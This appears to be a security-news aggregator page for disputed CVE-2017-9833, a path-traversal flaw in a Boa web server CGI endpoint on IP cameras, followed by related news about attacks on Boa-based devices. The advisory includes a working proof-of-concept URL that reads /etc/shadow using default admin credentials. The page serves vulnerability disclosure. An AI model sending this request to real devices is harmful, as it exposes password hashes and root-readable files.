Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2017-9833

** DISPUTED ** /cgi-bin/wapopen in Boa 0.94.14rc21 allows the injection of “…/…” using the FILECAMERA variable (sent by GET) to read files with root privileges. NOTE: multiple third parties report that this is a system-integrator issue (e.g., a vulnerability on one type of camera) because Boa does not include any wapopen program or any code to read a FILECAMERA variable.

CVE
#vulnerability#web#auth

BOA Web Server 0.94.14 - Access to arbitrary files as privileges Title: Vulnerability in BOA Webserver 0.94.14 Date: 20-06-2017 Status: Vendor contacted, patch available Scope: Arbitrary file access Platforms: Unix Author: Miguel Mendez Z Vendor Homepage: http://www.boa.org Version: Boa Webserver 0.94.14rc21 Vulnerability description ------------------------- -We can read any file located on the server The server allows the injection of “…/…” using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials Vulnerable variable: FILECAMERA=…/…/etc/shadow%00 Exploit link: /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=…/…/etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 Poc: http://127.0.0.1/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=…/…/etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 Screenshot: Step1 - https://i.imgur.com/V4ov1xa_d.jpg?maxwidth=640&shape=thumb&fidelity=high Step2 - https://i.imgur.com/7BJLNz4_d.webp?maxwidth=640&shape=thumb&fidelity Step3 - https://i.imgur.com/fi41vmu_d.jpg?maxwidth=640&shape=thumb&fidelity=high

Related news

Retired Software Exploited To Target Power Grids, Microsoft

By Habiba Rashid Boa was discontinued in 2005 but remained popular and is now becoming a crisis because of the complex nature of how it was built into the IoT device supply chain. This is a post from HackRead.com Read the original post: Retired Software Exploited To Target Power Grids, Microsoft

Microsoft: Popular IoT SDKs Leave Critical Infrastructure Wide Open to Cyberattack

Chinese threat actors have already used the vulnerable and pervasive Boa server to infiltrate the electrical grid in India, in spate of malicious incidents.

Hackers Exploiting Abandoned Boa Web Servers to Target Critical Industries

Microsoft on Tuesday disclosed the intrusion activity aimed at Indian power grid entities earlier this year likely involved the exploitation of security flaws in a now-discontinued web server called Boa. The tech behemoth's cybersecurity division said the vulnerable component poses a "supply chain risk that may affect millions of organizations and devices." The findings build on a prior report

CVE-2022-32535: Multiple Vulnerabilities PRA-ES8P2S Ethernet-Switch

The Bosch Ethernet switch PRA-ES8P2S with software version 1.01.05 runs its web server with root privilege. In combination with CVE-2022-23534 this could give an attacker root access to the switch.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907